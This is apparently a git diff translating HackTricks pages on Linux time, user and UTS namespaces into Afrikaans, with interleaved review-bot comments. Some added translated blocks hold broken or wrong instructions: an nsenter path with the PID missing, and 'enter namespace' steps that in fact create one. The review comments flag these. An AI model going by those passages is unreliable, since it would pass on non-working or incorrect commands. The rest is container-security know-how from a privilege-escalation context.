@@ -75,29 +77,39 @@ sudo find /proc -maxdepth 3 -type l -name time -exec ls -l {} \; 2>/dev/null | ``` {% endcode %} -### Enter inside a Time namespace +### Betree binne 'n Tyd-namespace +Om binne 'n Tyd-namespace in te gaan, kan jy die volgende stappe volg: + +1. Identifiseer die PID van die proses waarin jy wil binnekom. +2. Voer die volgende opdrag uit om die proses binne die Tyd-namespace te betree: + +```bash +nsenter --time=/proc//ns/time /bin/bash +``` + +Vervang `` met die regte proses-ID. + +Nadat jy die opdrag uitgevoer het, sal jy binne die Tyd-namespace wees en kan jy die funksies en hulpbronne binne daardie namespace manipuleer. ```bash nsenter -T TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/net`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory) * [https://www.phoronix.com/news/Linux-Time-Namespace-Coming](https://www.phoronix.com/news/Linux-Time-Namespace-Coming)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
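Review bot: in the block added under `### Betree binne 'n Tyd-namespace` the PID placeholder has been lost: `nsenter --time=/proc//ns/time /bin/bash` has an empty path segment and `Vervang `` met die regte proses-ID.` has empty backticks, so the instruction cannot be followed as written. The English source has no such block, and the unchanged `nsenter -T TARGET_PID --pid /bin/bash` line right after it already covers entering the namespace; either drop the added block or restore the placeholder as `/proc/<PID>/ns/time`. The two reference URLs are kept intact, which is correct.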
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md index fc3a839a1..a8197ceb5 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md @@ -1,96 +1,86 @@ -# User Namespace +# Gebruikersnaamruimte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A user namespace is a Linux kernel feature that **provides isolation of user and group ID mappings**, allowing each user namespace to have its **own set of user and group IDs**. This isolation enables processes running in different user namespaces to **have different privileges and ownership**, even if they share the same user and group IDs numerically. +'n Gebruikersnaamruimte is 'n Linux-kernelkenmerk wat **afsondering van gebruikers- en groep-ID-toewysings bied**, wat elke gebruikersnaamruimte in staat stel om sy **eie stel gebruikers- en groep-ID's** te hê. Hierdie afsondering maak dit moontlik dat prosesse wat in verskillende gebruikersnaamruimtes loop, **verskillende voorregte en eienaarskap het**, selfs as hulle dieselfde gebruikers- en groep-ID's numeries deel. -User namespaces are particularly useful in containerization, where each container should have its own independent set of user and group IDs, allowing for better security and isolation between containers and the host system. +Gebruikersnaamruimtes is veral nuttig in konteinering, waar elke kontainer sy eie onafhanklike stel gebruikers- en groep-ID's moet hê, wat beter sekuriteit en afsondering tussen konteinere en die gasheerstelsel moontlik maak. -### How it works: +### Hoe dit werk: -1. When a new user namespace is created, it **starts with an empty set of user and group ID mappings**. This means that any process running in the new user namespace will **initially have no privileges outside of the namespace**. -2. ID mappings can be established between the user and group IDs in the new namespace and those in the parent (or host) namespace. This **allows processes in the new namespace to have privileges and ownership corresponding to user and group IDs in the parent namespace**. However, the ID mappings can be restricted to specific ranges and subsets of IDs, allowing for fine-grained control over the privileges granted to processes in the new namespace. 
-3. Within a user namespace, **processes can have full root privileges (UID 0) for operations inside the namespace**, while still having limited privileges outside the namespace. This allows **containers to run with root-like capabilities within their own namespace without having full root privileges on the host system**. -4. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWUSER` flag. When a process moves to a new namespace or creates one, it will start using the user and group ID mappings associated with that namespace. +1. Wanneer 'n nuwe gebruikersnaamruimte geskep word, **begin dit met 'n leë stel gebruikers- en groep-ID-toewysings**. Dit beteken dat enige proses wat in die nuwe gebruikersnaamruimte loop, **aanvanklik geen voorregte buite die naamruimte het nie**. +2. ID-toewysings kan tot stand gebring word tussen die gebruikers- en groep-ID's in die nuwe naamruimte en dié in die ouer (of gasheer) naamruimte. Dit **maak dit moontlik dat prosesse in die nuwe naamruimte voorregte en eienaarskap het wat ooreenstem met die gebruikers- en groep-ID's in die ouer naamruimte**. Die ID-toewysings kan egter beperk word tot spesifieke reekse en subsets van ID's, wat fynbeheerde beheer oor die voorregte wat aan prosesse in die nuwe naamruimte verleen word, moontlik maak. +3. Binne 'n gebruikersnaamruimte kan **prosesse volle root-voorregte (UID 0) hê vir operasies binne die naamruimte**, terwyl hulle steeds beperkte voorregte buite die naamruimte het. Dit maak dit moontlik dat **konteinere met root-agtige vermoëns binne hul eie naamruimte kan loop sonder om volle root-voorregte op die gasheerstelsel te hê**. +4. Prosesse kan tussen naamruimtes beweeg deur die `setns()`-sisteemaanroep te gebruik of nuwe naamruimtes te skep deur die `unshare()`- of `clone()`-sisteemaanroep met die `CLONE_NEWUSER`-vlag te gebruik. 
Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, begin dit die gebruikers- en groep-ID-toewysings wat met daardie naamruimte geassosieer is, gebruik. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -U [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +Om gebruikersnaamruimte te gebruik, moet die Docker-daemon begin word met **`--userns-remap=default`** (In Ubuntu 14.04 kan dit gedoen word deur `/etc/default/docker` te wysig en dan `sudo service docker restart` uit te voer) -To use user namespace, Docker daemon needs to be started with **`--userns-remap=default`**(In ubuntu 14.04, this can be done by modifying `/etc/default/docker` and then executing `sudo service docker restart`) - -### Check which namespace is your process in - +### Kyk in watter naamruimte jou proses is ```bash ls -l /proc/self/ns/user lrwxrwxrwx 1 root root 0 Apr 4 20:57 /proc/self/ns/user -> 'user:[4026531837]' ``` - -It's possible to check the user map from the docker container with: - +Dit is moontlik om die gebruikerskaart van die Docker-container te kontroleer met: ```bash -cat /proc/self/uid_map - 0 0 4294967295 --> Root is root in host - 0 231072 65536 --> Root is 231072 userid in host +cat /proc/self/uid_map +0 0 4294967295 --> Root is root in host +0 231072 65536 --> Root is 231072 userid in host ``` - -Or from the host with: - +Of vanaf die gasheer met: ```bash -cat /proc//uid_map +cat /proc//uid_map ``` - -### Find all User namespaces +### Vind alle Gebruiker namespaces {% code overflow="wrap" %} ```bash 
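Review bot: the same fork omission as in time-namespace.md appears here: `Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace` loses `fork` from `makes unshare fork a new process`; suggest `laat `unshare` 'n nuwe proses vork`. Terminology is also inconsistent inside the hunk: the title and body use `Gebruikersnaamruimte`/`naamruimte`, while the `#### CLI` paragraph and the heading `### Vind alle Gebruiker namespaces` switch to `namespace`; pick one term for the page. The `cat /proc/self/uid_map` sample output has its leading spaces stripped (`+0 0 4294967295` replaces the indented original), so it no longer matches the kernel's padded output, and blank lines around fences are removed throughout; neither change is needed for the translation.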
@@ -100,22 +90,38 @@ sudo find /proc -maxdepth 3 -type l -name user -exec ls -l {} \; 2>/dev/null | ``` {% endcode %} -### Enter inside a User namespace +### Betree binne 'n Gebruikersnaamruimte +Om binne 'n gebruikersnaamruimte in te gaan, kan jy die volgende stappe volg: + +1. Kyk na die huidige gebruikersnaamruimte-inligting deur die volgende opdrag uit te voer: + ``` + cat /proc/$$/uid_map + ``` + +2. Maak 'n nuwe gebruikersnaamruimte met behulp van die volgende opdrag: + ``` + unshare --user + ``` + +3. Bevestig dat jy binne die nuwe gebruikersnaamruimte is deur die volgende opdrag uit te voer: + ``` + cat /proc/$$/uid_map + ``` + +Deur hierdie stappe te volg, kan jy binne 'n gebruikersnaamruimte binnekom en die relevante funksies en bevoegdhede daarvan verken. ```bash nsenter -U TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang kry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/user`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/user`). - -### Create new User namespace (with mappings) +### Skep 'n nuwe Gebruikers-namespace (met karterings) {% code overflow="wrap" %} ```bash unshare -U [--map-user=|] [--map-group=|] [--map-root-user] [--map-current-user] ``` {% endcode %} - ```bash # Container sudo unshare -U /bin/bash 
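Review bot: the three-step procedure added under `### Betree binne 'n Gebruikersnaamruimte` does not do what the heading says: `unshare --user` creates a new user namespace for the current shell instead of entering another process's namespace, which is what the unchanged `nsenter -U TARGET_PID --pid /bin/bash` line below it does, yet the closing sentence claims the steps let you enter a namespace. The English source has no such steps; drop them or move them under `### Skep 'n nuwe Gebruikers-namespace (met karterings)`, where `unshare -U` is already shown. If they stay, step 3 should say that `cat /proc/$$/uid_map` prints nothing after a bare `unshare --user`, because no mapping has been written yet.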
@@ -125,17 +131,15 @@ nobody@ip-172-31-28-169:/home/ubuntu$ #Check how the user is nobody ps -ef | grep bash # The user inside the host is still root, not nobody root 27756 27755 0 21:11 pts/10 00:00:00 /bin/bash ``` +### Herstel van Vaardighede -### Recovering Capabilities +In die geval van gebruikersnamespaces, **wanneer 'n nuwe gebruikersnamespace geskep word, word die proses wat die namespace betree, 'n volledige stel vaardighede binne daardie namespace toegeken**. Hierdie vaardighede stel die proses in staat om bevoorregte handelinge uit te voer soos **die koppel van lêersisteme**, die skep van toestelle, of die verandering van eienaarskap van lêers, maar **slegs binne die konteks van sy gebruikersnamespace**. -In the case of user namespaces, **when a new user namespace is created, the process that enters the namespace is granted a full set of capabilities within that namespace**. These capabilities allow the process to perform privileged operations such as **mounting** **filesystems**, creating devices, or changing ownership of files, but **only within the context of its user namespace**. - -For example, when you have the `CAP_SYS_ADMIN` capability within a user namespace, you can perform operations that typically require this capability, like mounting filesystems, but only within the context of your user namespace. Any operations you perform with this capability won't affect the host system or other namespaces. +Byvoorbeeld, as jy die `CAP_SYS_ADMIN` vaardigheid binne 'n gebruikersnamespace het, kan jy handelinge uitvoer wat tipies hierdie vaardigheid vereis, soos die koppel van lêersisteme, maar slegs binne die konteks van jou gebruikersnamespace. Enige handelinge wat jy met hierdie vaardigheid uitvoer, sal nie die gasheerstelsel of ander namespaces beïnvloed nie. 
{% hint style="warning" %} -Therefore, even if getting a new process inside a new User namespace **will give you all the capabilities back** (CapEff: 000001ffffffffff), you actually can **only use the ones related to the namespace** (mount for example) but not every one. So, this on its own is not enough to escape from a Docker container. +Daarom, selfs al sal die verkryging van 'n nuwe proses binne 'n nuwe gebruikersnamespace **alle vaardighede teruggee** (CapEff: 000001ffffffffff), kan jy eintlik **slegs diegene wat verband hou met die namespace** gebruik (soos die koppel van lêers byvoorbeeld), maar nie almal nie. Dus is dit op sigself nie genoeg om uit 'n Docker-houer te ontsnap nie. {% endhint %} - ```bash # There are the syscalls that are filtered after changing User namespace with: unshare -UmCpf bash @@ -160,20 +164,19 @@ Probando: 0x140 . . . Error Probando: 0x141 . . . Error Probando: 0x143 . . . Error ``` - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
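Review bot: `Vaardighede` in `### Herstel van Vaardighede` and throughout this hunk translates capabilities as skills; the page keeps `CAP_SYS_ADMIN` and `CapEff` untranslated, so the Linux term should stay `capabilities` (or `vermoëns`, which the hunk itself uses in `root-agtige vermoëns`), otherwise a reader cannot connect the prose to the `CapEff: 000001ffffffffff` value. In the warning hint, `(soos die koppel van lêers byvoorbeeld)` renders `mount for example` as linking files; the earlier sentence has the correct `die koppel van lêersisteme`, so use that form here too.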
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md index 7ecb9c6dc..c6a74d9e4 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md @@ -1,77 +1,84 @@ -# UTS Namespace +# UTS-namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -A UTS (UNIX Time-Sharing System) namespace is a Linux kernel feature that provides i**solation of two system identifiers**: the **hostname** and the **NIS** (Network Information Service) domain name. This isolation allows each UTS namespace to have its **own independent hostname and NIS domain name**, which is particularly useful in containerization scenarios where each container should appear as a separate system with its own hostname. +'n UTS (UNIX Time-Sharing System)-naamruimte is 'n Linux-kernelkenmerk wat **isolering van twee stelselidentifiseerders** bied: die **gasheernaam** en die **NIS** (Network Information Service) domeinnaam. Hierdie isolering maak dit moontlik dat elke UTS-naamruimte sy **eie onafhanklike gasheernaam en NIS-domeinnaam** het, wat veral nuttig is in konteinerisasiescenarios waar elke kontainer as 'n aparte stelsel met sy eie gasheernaam moet voorkom. -### How it works: +### Hoe dit werk: -1. When a new UTS namespace is created, it starts with a **copy of the hostname and NIS domain name from its parent namespace**. This means that, at creation, the new namespace s**hares the same identifiers as its parent**. However, any subsequent changes to the hostname or NIS domain name within the namespace will not affect other namespaces. -2. Processes within a UTS namespace **can change the hostname and NIS domain name** using the `sethostname()` and `setdomainname()` system calls, respectively. These changes are local to the namespace and do not affect other namespaces or the host system. -3. Processes can move between namespaces using the `setns()` system call or create new namespaces using the `unshare()` or `clone()` system calls with the `CLONE_NEWUTS` flag. When a process moves to a new namespace or creates one, it will start using the hostname and NIS domain name associated with that namespace. +1. 
Wanneer 'n nuwe UTS-naamruimte geskep word, begin dit met 'n **kopie van die gasheernaam en NIS-domeinnaam van sy ouernaamruimte**. Dit beteken dat die nuwe naamruimte by skepping **dieselfde identifiseerders as sy ouer deel**. Enige latere veranderinge aan die gasheernaam of NIS-domeinnaam binne die naamruimte sal egter nie ander naamruimtes beïnvloed nie. +2. Prosesse binne 'n UTS-naamruimte **kan die gasheernaam en NIS-domeinnaam verander** deur die `sethostname()` en `setdomainname()` stelseloproepe onderskeidelik te gebruik. Hierdie veranderinge is plaaslik vir die naamruimte en beïnvloed nie ander naamruimtes of die gasheerstelsel nie. +3. Prosesse kan tussen naamruimtes beweeg deur die `setns()` stelseloproep te gebruik of nuwe naamruimtes te skep deur die `unshare()` of `clone()` stelseloproepe met die `CLONE_NEWUTS` vlag. Wanneer 'n proses na 'n nuwe naamruimte beweeg of een skep, sal dit begin om die gasheernaam en NIS-domeinnaam wat met daardie naamruimte geassosieer word, te gebruik. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -u [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-sisteemaanroep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken by die skep van 'n nuwe proses nie, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak dit vir `unshare` moontlik om 'n nuwe proses te vork nadat die nuwe PID-namespace geskep is. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
